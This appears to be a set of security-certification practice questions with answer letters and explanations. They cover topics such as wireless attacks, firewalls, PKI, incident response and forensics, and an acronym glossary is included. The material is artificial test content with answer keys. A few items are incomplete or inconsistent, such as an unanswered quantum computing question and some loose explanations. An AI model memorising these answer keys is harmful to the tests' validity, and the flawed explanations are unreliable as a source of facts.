D A deauthentication attack, coupled with the use of a rogue AP, sends a stream of spoofed deauth frames to cause a client to deauthenticate from the AP. This may allow the attacker to interpose the rogue AP or to sniff information about the authentication process. Jamming occurs when a wireless network experiences interference from other radio sources. An attacker may jam a network to position an evil twin on the network. An attacker that creates an AP using a similar name as a legitimate AP is creating an evil twin. A rogue AP is usually coupled with another attack, such as jamming or deauthentication, to obtain critical information.
A client contacts a server for a data transfer. Instead of requesting TLS 1.3 authentication, the client claims legacy systems require the use of SSL. What type of attack might a data transfer using this protocol facilitate? A. Credential harvesting B. Key stretching C. Phishing D. Man-in-the-middle
D A downgrade attack can be used to facilitate a man-in-the-middle attack by requesting that the server use a lower specification protocol with weaker ciphers and key lengths, making it easier for a malicious actor to forge the trusted certificate authority's signature. Credential harvesting is a campaign specifically designed to steal account credentials. Key stretching takes a key that is generated from a user password and repeatedly converts it to a longer and more random key, adding extra layers of processing to a potential attacker's task. Phishing is a combination of social engineering and spoofing. It persuades or tricks the target into interacting with a malicious resource disguised as a trusted one, traditionally using email as the vector.
The security team at an organization looks to protect highly confidential servers. Which method does the team propose when protecting the servers against explosives? A. Air gap B. Faraday cage C. Colocation cage D. Vault
D A vault is a room that is hardened against unauthorized entry by physical means, such as drilling or explosives. An air-gapped host is one that is not physically connected to any network. Such a host would also normally have stringent physical access controls, such as housing it within a secure enclosure. A Faraday cage is an enclosure that features a charged conductive mesh that blocks signals from entering or leaving the area. Some data centers may contain racks with equipment owned by different companies (colocation). Technicians can install these racks inside cages so that they can only physically access the racks housing their own company's servers.
Compare and analyze the types of firewalls available to differentiate between them. Choose the answer with the most correct description. A. Packet filtering firewalls operate at layer 5 of the OSI model, while circuit-level stateful inspection firewalls operate at layer 3. B. An appliance firewall is also known as a stateful multilayer inspection or a deep packet inspection. An application aware firewall is a stand-alone hardware firewall that performs the function of a firewall only. C. A packet filtering firewall maintains stateful information about a connection between two hosts and implements an appliance firewall as a software application running on a single host. D. An application firewall can analyze the HTTP headers to identify code that matches a pattern, while an appliance firewall monitors all traffic passing into and out of a network segment.
D An application firewall can inspect the contents of packets at the application layer and can analyze the HTTP headers. It also analyzes the HTML code present in HTTP packets to try to identify code that matches a pattern in its threat database. Packet filtering firewalls operate at layer 3 of the OSI model, while circuit-level stateful inspection firewalls operate at layer 5 of the model. An application-aware firewall is also known as a stateful multilayer inspection or deep packet inspection firewall. An appliance firewall is a stand-alone hardware firewall that performs the function of a firewall only. A packet filtering firewall is stateless, and an application firewall is a software application running on a single host.
The owner of a company asks a network manager to recommend a mobile device deployment model for implementation across the company. The owner states security is the number one priority. Which deployment model should the network manager recommend for implementation? A. BYOD since the company can restrict the usage to business only applications. B. CYOD because even though the employee picks the device, the employee only conducts official business on it. C. COPE since only company business can be conducted on the device. D. COBO because the company retains the most control over the device and applications.
D Corporate Owned, Business Only (COBO) devices provide the greatest security of the four mobile device deployment models. The device is the property of the company and may only be used for company business. The Bring Your Own Device (BYOD) model is the least secure of the four models. The device is owned by the employee, and the employee agrees to use it for company use. Deploying a Choose Your Own Device (CYOD) model means the device is chosen by the employee and owned by the company. The employee is able to use the device for personal business. A Corporate Owned, Personally-Enabled (COPE) device is supplied and chosen by the company and personal use is allowed.
A hospital must balance the need to keep patient privacy information secure and the desire to analyze the contents of patient records for a scientific study. What cryptographic technology can best support the hospital's needs? A. Blockchain B. Quantum computing C. Perfect forward security (PFS) D. Homomorphic encryption
D Homomorphic encryption is used to share privacy-sensitive data sets. It allows a recipient to perform statistical calculations on data fields, while keeping the data set as a whole encrypted, thus preserving patient privacy. Blockchain uses cryptography to secure an expanding list of transactional records. Each record, or block, goes through a hash function. Each block's hash value links to the hash value of the previous block. Quantum computing could serve as a secure foundation for secure cryptosystems and tamper-evident communication systems that would allow secure key agreement. Perfect forward security (PFS) mitigates the risks from RSA key exchanges through the use of ephemeral session keys to maintain confidentiality.
Analyze the methods for authentication to a Secure Shell (SSH) and determine which statement best summarizes the host-based authentication method. A. The user's private key is configured with a passphrase that must be input to access the key. B. The client submits credentials that are verified by the SSH server using RADIUS. C. The client submits a Ticket Granting Ticket (TGT) that is obtained when the user logged onto the workstation. D. The client sends a request for authentication and the server generates a challenge with the public key.
D In host-based authentication, the server is configured with a list of authorized client public keys. The client requests authentication using one of these keys, and the server generates a challenge with the public key. The public key authentication method uses the user's private key, which is configured with a passphrase that the user must input to access the key. The username and password method requires the client to submit credentials that the SSH server verifies against a local user database. The Kerberos method requires the client to submit the Kerberos credentials (TGT) that are obtained when the user logs onto the workstation.
A security expert archives sensitive data that is crucial to a legal case involving a data breach. The court is holding this data due to its relevance. The expert fully complies with any procedures as part of what legal process? A. Chain of custody B. Due process C. Forensics D. Legal hold
D Legal hold refers to information that the security expert must preserve, which may be relevant to a court case. Regulators or the industry's best practice may define the information that is subject to legal hold. Chain of custody reinforces the integrity and proper handling of evidence from collection, to analysis, to storage, and finally to presentation. When security breaches go to trial, the chain of custody protects an organization against accusations of tampering with the evidence. Due process is a common law term used in the US and UK to require that people only be convicted of crimes following the fair application of the laws of the land. Forensics is the practice of collecting evidence from computer systems to a standard that a court of law will accept.
When provisioning application services in network architecture, an engineer uses a microservices approach as a solution. Which principle best fits the engineer's implementation? A. Components working together to perform a workflow B. Being closely mapped to business workflows C. The performing of a sequence of automated tasks D. Each program or tool should do one thing well
D Microservice-based development uses a philosophy that each program or tool should do one thing well. Each microservice should be capable of being developed, tested, and deployed independently, and is said to be highly decoupled rather than just loosely decoupled. Service-oriented architecture (SOA) conceives of atomic services closely mapped to business workflows. Each service takes defined inputs and produces defined outputs. Services integration refers to ways of making these decoupled service or microservice components work together to perform a workflow. Orchestration performs a sequence of automated tasks. Orchestrated steps run numerous automated scripts or API service calls.
A hotel guest opens their computer and logs into the Wi-Fi without prompting the guest for a username and password. Upon opening an internet browser, a splash page appears that requests the guest's room number and last name for authentication. Which type of authentication is the hotel utilizing? A. Protected B. Extensive C. Group D. Open
D Mostly used on a public access point, open authentication does not require the client to authenticate, as it sends data over the link unencrypted. When combined with a secondary authentication mechanism, a browser can manage open authentication. The secondary authentication redirects the client to a captive portal or a splash page. Wi-Fi Protected Setup (WPS) requires all of the wireless devices to be WPS capable and use a PIN. This type of authentication is common for residential consumers. Extensible Authentication Protocol (EAP) supports different types of authentication within the same overall topology of devices. EAP implementations can include smart cards, one-time passwords, and biometric scanning for authentication. Group authentication uses a pre-shared key that employs a passphrase to generate the key that encrypts communication. The group uses the same secret key.
A network manager is installing a new switch on the network. Which option does the manager use to harden network security after installation? A. A Group Policy Object (GPO) should be configured to deploy custom settings. B. The Server Core option should be used to limit the device to only using Hyper-V and DHCP. C. Microsoft Baseline Security Analyzer (MBSA) is used on Windows networks and validates the security configuration of a Windows system. D. The network manager should ensure all patches are applied and it is appropriately configured.
D Network appliances, such as switches, present a special case for hardening. Most of these devices are often only configurable within the parameters allowed by their manufacturers. Hardening is often restricted to ensuring the device is patched and configured correctly. GPOs are used on Windows networks and are a means of applying security settings across a range of computers. Since the switch is a network appliance, a GPO is not applicable in this situation. The Server Core option may be utilized when installing a server on the network. It excludes most of the familiar shell tools and only supports a limited number of roles, including Hyper-V and DHCP. Microsoft Baseline Security Analyzer (MBSA) is used on Windows networks and validates the security configuration.
The IT team at a company discovers that a Windows server is infected with malware. As a result, the server is not functioning properly. Which event log does the team review to find errors from failing services related to newly installed software? A. Setup B. Security C. System D. Application
D On a Windows system, the application event logs record events generated by applications and services, such as when a service run by a third-party application cannot start. On a Windows system, the setup log contains events generated during the installation of the Windows operating system (OS). Security event logs on a Windows system record and reveal audit events, such as a failed logon or access to a file being denied. The system event logs on a Windows system include events generated by the operating system and its services, such as storage volume health checks.
Evaluate the typical weaknesses found in network architecture and determine which statement best aligns with a security weakness. A. A company has a single network channel. B. A company has many different systems to operate one service. C. A company has a habit of implementing quick fixes. D. A company has a flat network architecture.
D Overdependence on perimeter security occurs when the network architecture is flat. If an attacker can penetrate the network edge, the attacker will then have freedom of movement throughout the entire network. A single point of failure occurs with a "pinch point" by relying on a single hardware server or appliance or network channel. Complex dependencies are services that require many different systems to be available. Ideally, the failure of individual systems or services should not affect the overall performance of other network services. Availability over confidentiality and integrity occurs when a company takes shortcuts to get a service up and running. Compromising security might represent a quick fix but creates long-term risks.
Analyze the following attacks to determine which best illustrates a pharming attack. A. A customer gets an email that appears to be from their insurance company. The email contains a link that takes the user to a fake site that looks just like the real insurance company site. B. An employee gets a call from someone claiming to be in the IT department. The caller says there was a problem with the network, so they need the employee's password in order to restore network privileges. C. A company's sales department often has after-hour training sessions, so they order dinner delivery online from the restaurant across the street. An attacker is able to access the company's network by compromising the restaurant's unsecure website. D. A customer enters the correct URL address of their bank, which should point to the IP address 172.1.24.4. However, the browser goes to 168.254.1.1, which is a fake site designed to look exactly like the real bank site.
D Pharming is a means of redirecting users from a legitimate website to a malicious one that relies on corrupting the way the victim's computer performs IP address resolution. This is illustrated in the bank customer scenario. Phishing is a type of email-based social engineering attack, in which the attacker sends email from a supposedly reputable source to try to elicit private information from the victim. This is exhibited in the insurance customer scenario. Vishing is a phishing attack conducted through a voice channel. This is seen in the IT department scenario. A watering hole attack relies on the circumstance that a group of targets may use an unsecure third-party website. This is shown in the sales department scenario.
A company has recently started using a Platform as a Service (PaaS). Compare cloud service types to determine what is being deployed. A. The company has leased servers and a Storage Area Network (SAN). B. The company has leased a suite of applications that were outside of the budget to purchase outright. C. The company has outsourced the responsibility for information assurance. D. The company has leased an instance that runs Microsoft Azure SQL Database.
D Platform as a service (PaaS) provides resources somewhere between SaaS and IaaS. A typical PaaS solution would provide servers and storage network infrastructure (as per IaaS) but also provide a multi-tier web application/database platform on top. IaaS is a means of provisioning resources such as servers, load balancers, and Storage Area Network (SAN) components quickly. SaaS is a different model of provisioning software applications. Rather than purchasing software licenses for a given number of seats, a business can access software hosted on a supplier's servers on a pay-as-you-go or lease arrangement. Managed Security Services Provider (MSSP) is a means of fully outsourcing responsibility for information assurance to a third party.
Which two cryptographic functions can be combined to authenticate a sender and prove the integrity of a message? A. Hashing and symmetric encryption B. Public key cryptography and digital enveloping C. Hashing and digital enveloping D. Public key cryptography and hashing
D Public key cryptography (public and private keys) can be used to authenticate a sender. Combine this with a hash output of the message and a secret (or private) key to create a message authentication code (MAC) to validate the integrity of the message. A key exchange system known as a digital envelope or hybrid encryption combines the bulk encryption capabilities of symmetric encryption with the authentication capability of public key cryptography. Asymmetric encryption is also called public key cryptography. A digital envelope allows the sender and recipient to exchange a symmetric encryption key securely by using public key cryptography. Hashing proves integrity by computing a unique checksum from input. Digital envelope is another term for the hybrid encryption that combines public key encryption and symmetric encryption.
Given that layer 2 does not recognize Time to Live, evaluate the potential problems to determine which of the following options prevents this issue. A. ICMP B. L2TP C. NTP D. STP
D STP (Spanning Tree Protocol) is a switching protocol that prevents network loops by dynamically disabling links as needed. Since layer 2 protocols have no concept of Time To Live, layer 2 broadcast traffic could continue to loop through a network with multiple paths indefinitely. ICMP (Internet Control Message Protocol) is an IP-level protocol for reporting errors and status information that supports the function of troubleshooting utilities such as ping. L2TP (Layer 2 Tunneling Protocol) is the standard VPN (Virtual Private Network) protocol for tunneling point-to-point sessions across a variety of network protocols. NTP (Network Time Protocol) is a Transmission Control Protocol/Internet Protocol (TCP/IP) application protocol allowing machines to synchronize to the same time clock that runs over UDP port 123.
A recent systems crash prompts an IT administrator to perform recovery steps. Which mechanism does the administrator use to achieve nonpersistence? A. Configuration validation B. Data replication C. Restoration automation D. Revert to known state
D Snapshot/revert to known state is a saved system state that the administrator can reapply to the instance on a system. This is a mechanism that achieves nonpersistence. Configuration validation is a process that ensures that a recovery solution is working at each layer (hardware, network connectivity, data replication, and application). Data replication is a process of reinstating data on a system. Nonpersistence would occur by separating any system restore from data replication. Automation may restore a system as software may build and provision an instance according to any template instructions. This is a mastering instruction.
A systems breach occurs at a financial organization. The system in question contains highly valuable data. When performing data acquisition for an investigation, which component does an engineer acquire first? A. RAM B. Browser cache C. SSD data D. Disk controller cache
D The order of volatility outlines a general list of which components the engineer should examine for data. The engineer should first examine CPU registers and cache memory (including the cache on disk controllers and GPUs). After any cache memory, the engineer should acquire the contents of nonpersistent system memory (RAM), including routing tables, ARP caches, process tables, and kernel statistics. Only after any available system caches or memory does the engineer perform data acquisition on persistent mass storage devices (such as HDDs or SSDs); this includes temporary files, such as those found in a browser cache.
Based on knowledge of the fundamentals of One-time Passwords (OTP), which of the following choices represents the problem that exists with HMAC-based One-time Password Algorithm (HOTP) and is addressed by Time-based One-time Password Algorithm (TOTP)? A. HOTP is not configured with a shared secret. B. The server is not configured with a counter in HOTP. C. Only the HOTP server computes the hash. D. Tokens can be allowed to continue without expiring in HOTP.
D Tokens can persist unexpired in HOTP, increasing the risk of an attacker obtaining one and decrypting data in the future. TOTP addresses this by adding a value to the shared secret derived from the device's and server's local timestamp. TOTP automatically expires each token after a short window of time. The authentication server and client token are configured with the same shared secret in HOTP. The HOTP server is configured with a counter, combining with the shared secret to create a one-time password. When the HOTP value is authenticated, it increments by one. The server and the device both compute the hash and derive a 6-8 digit HOTP value.
An IT director reads about a new form of malware that targets a system widely utilized in the company's network. The director wants to discover whether the network has been targeted, but also wants to conduct the scan without disrupting company operations or tipping off potential attackers to the investigation. Evaluate vulnerability scanning techniques and determine the best tool for the investigation. A. Credentialed scan B. Configuration review C. Penetration testing D. Threat hunting
D Where a pen test attempts to demonstrate a system's weakness or achieve intrusion, threat hunting is based only on analysis of data within the system. It is potentially less disruptive than pen testing. A credentialed scan has a user account with logon rights to hosts and permissions appropriate for the testing routines. Credentialed scans are intrusive and allow in-depth analysis and insight into what an insider attack might achieve. A configuration review assesses the configuration of security controls and application settings and permissions compared to established benchmarks. Penetration testing, an intrusive, active scanning technique, does not stop at detection, but attempts to gain access to a system.
The National Institute of Standards and Technology (NIST) provides a framework that classifies security-related functions. Which description aligns with the "respond" function? A. Evaluate risks, threats, and vulnerabilities. B. Perform ongoing, proactive monitoring. C. Implement resilience to restore systems. D. Identify, analyze, and eradicate threats.
D The identify function is to develop security policies and capabilities. This function is used to evaluate risks, threats, and vulnerabilities and recommend security controls to mitigate them. The detect function is to perform ongoing, proactive monitoring to ensure that controls are effective and capable of protecting against new types of threats. The recover function is to implement cybersecurity resilience to restore systems and data if other controls are unable to prevent attacks. The respond function is to identify, analyze, contain, and eradicate threats to systems and data security.
ESP
Encapsulated Security Payload
FRR
False Rejection Rate
GLBA
Gramm-Leach-Bliley Act
GUI
Graphical User Interface
HOTP
HMAC-based One-Time Password
HSTS
HTTP Strict Transport Security
IoC
Indicators of Compromise
ISAC
Information Sharing and Analysis Center
IV
Initialization Vector
ISO
International Organization for Standardization
ICMP
Internet Control Message Protocol
IKE
Internet Key Exchange
IMAP4
Internet Message Access Protocol v4
NIDS
Network Intrusion Detection System
PFS
Perfect Forward Secrecy
PaaS
Platform as a Service
POP3S
Post Office Protocol Version 3 Secure
Examine each statement and determine which most accurately describes a major limitation of quantum computing technology. A. Presently, quantum computers do not have the capacity to run useful applications. B. Quantum computing is not yet sufficiently secure to run current cryptographic ciphers. C. Quantum computing is not sufficiently agile to update the range of security products it most frequently uses. D. Attackers may exploit a crucial vulnerability in quantum computing to covertly exfiltrate data.
Presently, the most powerful quantum computers have about 50 qubits. A quantum computer will need about a million qubits to run useful applications. Quantum computing could put the strength of current cryptographic ciphers at risk, but it also has the promise of underpinning more secure cryptosystems in the future. Cryptographic agility refers to an organization's ability to update the specific algorithms used in security products without affecting the business workflows that those products support. Quantum computing could pose a threat to cryptographic agility. Steganography obscures the presence of a message and can be used for data exfiltration. The quantum computing properties of entanglement, superposition, and collapse suit the design of a tamper-evident communication system that would allow secure key agreement.
RADIUS
Remote Authentication Dial-In User Service
REST
Representational State Transfer
RRset
Resource Records Set
RSA
Rivest, Shamir, Adleman
SA
Security Associations
SAE
Simultaneous Authentication of Equals
SLE
Single Loss Expectancy
STP
Spanning Tree Protocol
SEH
Structured Exception Handler
TAXII
Trusted Automated eXchange of Indicator Information
MitM
man-in-the-middle
NIST
National Institute of Standards and Technology
The U.S. Department of Defense (DoD) awards an IT contract to a tech company to perform server maintenance. The servers are colocated at a third-party storage facility. The DoD and the tech company enter into what type of agreement which commits the tech company to implement the agreed upon security controls? A. Interconnection security agreement (ISA) B. Non-disclosure agreement (NDA) C. Data sharing and use agreement D. Service level agreement (SLA)
A Any federal agency interconnecting its IT system to a third party must create an ISA to govern the relationship. An ISA sets out a security risk awareness process and commits the agency and supplier to implementing security controls. An NDA establishes a legal basis for protecting information assets. If a party breaks this agreement and shares prohibited information, they may face legal consequences. Data sharing and use agreements specify the purpose for which an entity can collect and analyze data, and proscribes the use of re-identification techniques. An SLA is a contractual agreement detailing the terms under which a contractor provides service. This includes terms for security access controls and risk assessments plus processing requirements for confidential and private data.
Which statement best describes how a hierarchical certificate authority (CA) trust model mitigates the weakness in a single CA model and guards against the compromise of the root CA? A. The hierarchical CA model still uses a single root CA, but delegates certificate granting authority to intermediate CAs, so the root CA may go offline in a secure configuration. B. The hierarchical CA model uses multiple root CAs to issue certificates, so if a root is damaged or compromised, the structure does not collapse. C. The hierarchical CA model still uses a single root CA, but delegates certificate granting authority to intermediate CAs, so the root may stay online in a secure, redundant configuration. D. The hierarchical CA model uses multiple root CAs to issue certificates so any one of the root CAs may go offline in a secure storage configuration while retaining certificate granting authority.
A In the hierarchical model, a single CA (called the root) issues certificates to several intermediate CAs. The intermediate CAs issue certificates to subjects (leaf or end entities). In the hierarchical model, the root is still a single point of failure. Because of the high risk compromising the root CA poses, a secure configuration involves making the root an offline CA. This means that the system disconnects the root from any network and usually keeps it in a powered-down state. Different intermediate CAs can be set up with different certificate policies, and each leaf certificate can trace back to the root CA along the certification path. This is also referred to as certificate chaining or a chain of trust.
Management looks to IT for a solution to identify successful and failed login attempts. Which solution will IT provide to management? A. Logs B. Network monitors C. Packet capture D. Sniffer
A Logs are one of the most valuable sources of security information. A system log can be used to diagnose availability issues. A security log can record both authorized and unauthorized uses of a resource or privilege. A network monitor collects data about network appliances, such as switches, access points, routers, firewalls, and servers. A monitor is used to monitor load status for CPU/memory, state tables, disk capacity, and more. Data captured from network packet capture provides summary statistics about bandwidth and protocol usage. Sensors/sniffers are used for packet capture and provide a summary of statistics along with protocol usage and the opportunity for detailed frame analysis.
The IT director at a financial institution grants account permissions using an access control list (ACL). This illustrates what type of security control? A. Preventative B. Deterrent C. Corrective D. Detective
A Preventative controls act to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place. Access control lists (ACL) configured on firewalls and file system objects are preventative-type controls. Deterrent controls may not physically or logically prevent access, but psychologically discourage an attacker from attempting an intrusion. Signs and warnings of legal penalties against trespass or intrusion are deterrent controls. Corrective controls are typically implemented after an attack with the goal of eliminating or reducing the impact of an intrusion event. Detective controls may not prevent or deter access, but they will identify and record any attempted or successful intrusion. A detective control operates during the progress of an attack.
A power outage disrupts a medium-sized business, and the company must restore systems from backups. If the business can resume normal operations from a backup made two days ago, what metric does this scenario represent? A. Recovery Point Objective (RPO) B. Recovery time objective (RTO) C. Maximum tolerable downtime (MTD) D. Work Recovery Time (WRT)
A RPO is the amount of data loss a system can sustain, measured in time. That is, if a virus destroys a database, an RPO of 24 hours means the system can recover the data (from a backup copy) to a point not more than 24 hours before the infection. RTO is the post-disaster period an IT system may remain offline, including the amount of time it takes to identify a problem and perform recovery. MTD is the longest period of time that a business function outage may occur, without causing irrecoverable business failure. Following system recovery, WRT is the additional work necessary to reintegrate systems, test functionality, and brief users on changes and updates to fully support the business function.
Which of the following has a cyber security framework (CSF) that focuses exclusively on IT security, rather than IT service provisioning? A. National Institute of Standards and Technology (NIST) B. International Organization for Standardization (ISO) C. Control Objectives for Information and Related Technologies (COBIT) D. Sherwood Applied Business Security Architecture (SABSA)
A The National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) is a relatively new addition to the IT governance space, and is distinct from other frameworks by focusing exclusively on IT security, rather than IT service provision more generally. ISO develops standards and frameworks governing the use of computers, networks, and telecommunications, including ones for information security (27000 series). It is a commercial product. COBIT is an IT governance framework with security as a core component. COBIT is published by ISACA and is also a commercial product, available through APMG International. SABSA is a methodology for providing information assurance aligned to business needs and driven by risk analysis.
During a cyber incident response exercise, a blue team takes steps to ensure the company and its affiliates can still use network systems while managing a simulated threat in real-time. Based on knowledge of incident response procedures, what stage of the incident response process is the blue team practicing? A. Containment B. Identification C. Eradication D. Recovery
A The goal of the containment stage is to secure data while limiting the immediate impact on customers and business partners. Based on an alert or report, identification determines whether an incident has taken place, how severe it might be (triage), and notifies stakeholders. Once the security admin contains the incident, eradication removes the cause and restores the affected system to a secure state. When the security admin eradicates the cause of the incident, they can reintegrate the system into the business process that it supports. This recovery phase may involve restoration of data from backup and security testing.
A business is setting up new network devices. The network devices are critical and the manager wants to ensure that they have access despite the high turnover of personnel in the IT industry. They set up accounts through a RADIUS server that are normally used to log in. What should they configure as a backup? A. Administrator/Root account B. Administrator's user account C. Network service account D. Local service account
A The local system account creates the host processes that start Windows before the user logs on. Administrative or privileged accounts can install and remove apps and device drivers. Admins should prohibit superuser accounts from logging on in normal circumstances. Admins should replace the default superuser with named accounts that have sufficient elevated privileges for a given job role. This ensures that admins can audit administrative activity and the system conforms to non-repudiation. A network service account has the same privileges as the standard user account but can present the computer's account credentials when accessing network resources. A local service account has the same privileges as the standard user account. It can only access network resources as an anonymous user.
Analyze the factors associated with performing a Business Process Analysis (BPA) and select the statement that aligns with the output factors. A. The data or resources a function produces B. The source of information for performing a function C. The resources supporting a function D. A description of how a function is performed
A The output factors are data or resources produced by a function. This is one of five factors that should be identified when performing a Business Process Analysis (BPA). A BPA is performed to identify dependencies, which should be reduced as much as possible between critical components. The input factors are the sources of information for performing a function, including the resulting impact if these are delayed or out of sequence. This can include data entered into a system, or data flowing from other systems or sites. The staff support the function and may also include other resources. BPAs are all-encompassing, including the staff that monitor, maintain, and repair the systems that process data. Process flow is a step-by-step description of how a function is performed, for example, a flow chart showing the process from start to end. This chart can show dependencies and the results of failures within the process.
Which statement correctly differentiates between file transfer protocol (FTP), secure shell file transfer protocol (SFTP), and file transfer protocol over secure socket layer (FTPS)? A. FTP has no encryption. FTPS adds transport layer security (TLS), and SFTP is an entirely different protocol based on the network protocol SSH (secure shell). B. FTP uses only basic encryption, while SFTP adds a layer of security with secure shell (SSH). FTPS uses an entirely different protocol, using secure port 990. C. FTP has no encryption. SFTP adds a layer of security with secure shell (SSH), and FTPS uses an entirely different protocol, using secure port 990. D. FTP uses only basic encryption, while FTPS adds transport layer security (TLS), and SFTP is an entirely different protocol based on the network protocol SSH (secure shell).
A Unlike both FTP and FTPS, SFTP uses only one connection and encrypts both authentication information and data files being transferred. SFTP addresses FTP's privacy and integrity issues by encrypting the authentication and data transfer between client and server. SFTP establishes a secure link using Secure Shell (SSH) over transmission control protocol (TCP) port 22. SFTP enables the use of ordinary FTP commands and data transfer over the secure link without risk of eavesdropping or man-in-the-middle attacks. This solution requires an SSH server that supports SFTP and SFTP client software. FTPS secures FTP using the connection security protocol SSL/TLS. FTPS negotiates an SSL/TLS tunnel before exchanging any FTP commands. This mode uses the secure port 990 for the control connection.
A company follows a bring your own device (BYOD) mobile implementation. What is an ideal solution the company can use to overcome some of the security risks involved with employee-supplied devices? A. Virtual desktop infrastructure (VDI) B. Location services C. Remote wipe D. Carrier unlocking
A Virtual desktop infrastructure (VDI) means provisioning an OS desktop to interchangeable hardware. The hardware only has to be capable of running a VDI client viewer or have a browser that supports a clientless HTML5 solution. Each time a user accesses VDI, the session is "as new" and employees can access it remotely. Location services alone represent a security risk. Location services can use geofencing to enforce context-aware authentication based on the device's location. If a malicious actor steals a user's device, a remote wipe (kill switch) can reset the device to factory defaults or clear personal data (sanitization). Carrier unlocking involves the removal of restrictions that lock a device to a single carrier and can be used for privilege escalation.
Compare the components found in a virtual platform and select the options that accurately differentiate between them. (Select all that apply.) A. Hypervisors are Virtual Machine Monitors (VMM) and guest operating systems are Virtual Machines (VM). B. Hypervisors facilitate interactions with the computer hardware and computers are the platform that hosts the virtual environment. C. Computers are the operating systems that are installed under the virtual environment and guest operating systems are the platform that host the virtual environment. D. Hypervisors are not operating systems and computers are the platforms that host the virtual environment.
A and B Hypervisors are the Virtual Machine Monitor (VMM) and guest operating systems are the Virtual Machines (VM) found within the virtual platform. Hypervisors manage the virtual machine environment and facilitate interaction with the computer hardware and network. The computer component is the platform that hosts the virtual environment. Multiple computers may also be networked together. Computers are the platform of the virtual environment and guest operating systems are the operating systems installed under the virtual environment. Guest operating systems are the operating systems installed under the virtual environment and computers are the platform that hosts the virtual environment.
Which features distinguish a next-generation endpoint detection and response (EDR) product from traditional EDR solutions? (Select all that apply.) A. Next-generation endpoint agents use cloud management, rather than reporting to an on-premises server. B. Next-generation endpoint detection systems use artificial intelligence (AI) and machine learning to perform user and entity behavior analysis (UEBA). C. Next-generation endpoint agents report baseline configuration deviations, whereas legacy systems report threats based on signature-detection. D. The primary purpose of next-generation endpoint agents is to stop initial threat execution, while traditional systems aim to detect and report attacks.
A and B Where earlier endpoint protection suites report to an on-premises management server, next-generation endpoint agents are more likely to be managed from a cloud portal. Next-generation endpoint agents use artificial intelligence (AI) and machine learning to perform user and entity behavior analysis as part of the security service provider's offering. Baseline deviation reporting means testing the actual configuration of hosts to ensure that their configuration settings match the baseline template. An endpoint detection and response (EDR) product's aim is not to prevent initial execution, but to provide real-time and historical visibility into the compromise, contain the malware within a single host, and facilitate remediation of the host to its original state.
A security specialist reviews an open closet with network cables and discovers highly exposed areas that are at high risk of physical intrusion. The specialist recommends creating a protected distribution system (PDS) to lower security risks. What would a PDS help solve? (Select all that apply.) A. Eavesdropping B. Speed C. Damage D. Length
A and C A physically secure cabled network is referred to as a protected distribution system (PDS). This method of cable installation can deter eavesdropping. A hardened PDS is one where all cabling is routed through sealed metal conduit. This type of enclosure protects the cabling from accidental or intentional damage. The speed, or throughput, of a network cable is dependent on the type of cable, such as Cat5 versus Cat6. The cable speed is typically based on the number of twists inside the cable and is not a security concern. The length of a network cable is dependent on the type of cable, such as Cat5 versus Cat6. The cable length dictates how far a signal can travel and is not a security concern.
A suspected malicious insider at a company conducted a network attack. A security manager, who personally knew the insider, conducts forensic analysis, looking for evidence of misconduct on the employee's workstation and in system logs. The manager packages the data for further review but modifies it by removing certain fields of data to make it easier to review. Examine the scenario and determine what argument a defense attorney might bring up concerning the forensic investigative process. (Select all that apply.) A. The examiner conducted analysis with bias. B. The examiner tampered with evidence by accessing system logs. C. The examination did not follow ethical procedures. D. E-discovery tools applied biased filters to the evidence for research.
A and C Investigators must perform analysis without bias. Investigators should form conclusions and opinions only from the direct evidence under analysis. Defense counsel may try to use any deviation of good ethical and professional behavior to have the forensics investigator's findings dismissed. Ideally, investigators must not change or manipulate the evidence. If a device used as evidence must be manipulated to facilitate analysis, the reasons for doing so must be sound and the process of doing so must be recorded. E-discovery search tools, such as word and semantic searches, allow investigators to locate files of interest to the case. Tags apply standardized keywords or labels to files and metadata to help organize the evidence according to relevance or confidentiality.
A user enters the web address of a favorite site and the browser returns the following: "There is a problem with this website's security certificate." The user visits this website frequently and has never had a problem before. Applying knowledge of server certificates, select the circumstances that could cause this error message. (Select all that apply.) A. The system's time setting is incorrect. B. The certificate is pinned. C. The web address was mistyped. D. The certificate expired.
A and D If the date and time settings on the system are not synchronized with the server's setting, the server's certificate will be rejected. An expired server certificate would cause the browser to return an error message. Certificate pinning ensures that when a client inspects the certificate presented by a server, it is inspecting the proper certificate. This is mostly done to prevent a Man-in-the-Middle attack and would not generate an error message. A mistyped web address would not return an error message about the server certificate. It would return a message that the website could not be found.
An engineer implements a security solution to protect a domain. The engineer decides on DNS Security Extensions (DNSSEC) to prevent spoofing. Which features does the engineer rely on for protection? (Select all that apply.) A. Zone Signing Key B. RRset package C. Access Control List D. Key Signing Key
A, B, and D With DNS Security Extensions (DNSSEC) enabled, the authoritative server for the zone creates a "package" of resource records (RRset). An RRset is signed with a private key (the Zone Signing Key). When another server requests a secure record exchange, the authoritative server returns the package and its public key. With DNSSEC, the public Zone Signing Key is signed with a separate Key Signing Key. Separate keys are used so that if there is a compromise, the domain can continue to operate securely by revoking the compromised key and issuing a new one. An Access Control List can prevent zone transfers to unauthorized hosts, preventing an external server from obtaining information about the private network. This is not part of DNSSEC.
A hacker remotely gains unauthorized access to a company's system and makes a copy of proprietary business data. Which of the following summarizes the event that has taken place? A. Data exfiltration B. Data loss C. Identity theft D. Financial loss
A. Data exfiltration refers to the methods and tools by which an attacker transfers data without authorization from the victim's systems to an external network or media. Data loss describes any event where data has become unavailable, either permanently or temporarily. This can happen when data becomes corrupt and cannot be restored from a backup. Identity theft may involve, for example, the hacker's ability to obtain account credentials to access a system or personal details and financial information to make fraudulent credit card purchases. Financial losses are due to damages, fines, and loss of business. Although the copying of proprietary data can lead to greater competition and loss of business, this does not describe this specific attack.
A security engineer implements a secure wireless network. In doing so, the engineer decides to use EAP with Flexible Authentication via Secure Tunneling (EAP-FAST). Which authentication approach does the engineer implement? A. Protected Access Credential (PAC) instead of a certificate B. Any inner authentication protocol such as PAP or CHAP C. Only requiring a server-side public key certificate D. The supplicant and server are configured with certificates.
A. EAP with Flexible Authentication via Secure Tunneling (EAP-FAST) is similar to PEAP, but instead of using a certificate to set up the tunnel, it uses a Protected Access Credential (PAC). EAP-Tunneled TLS (EAP-TTLS) is similar to PEAP. It uses a server-side certificate and can use any inner authentication protocol (PAP or CHAP, for instance). In Protected Extensible Authentication Protocol (PEAP), an encrypted tunnel is established between the supplicant and authentication server and only requires a server-side public key certificate. EAP-TLS is one of the strongest types of authentication and the supplicant and server are configured with certificates.
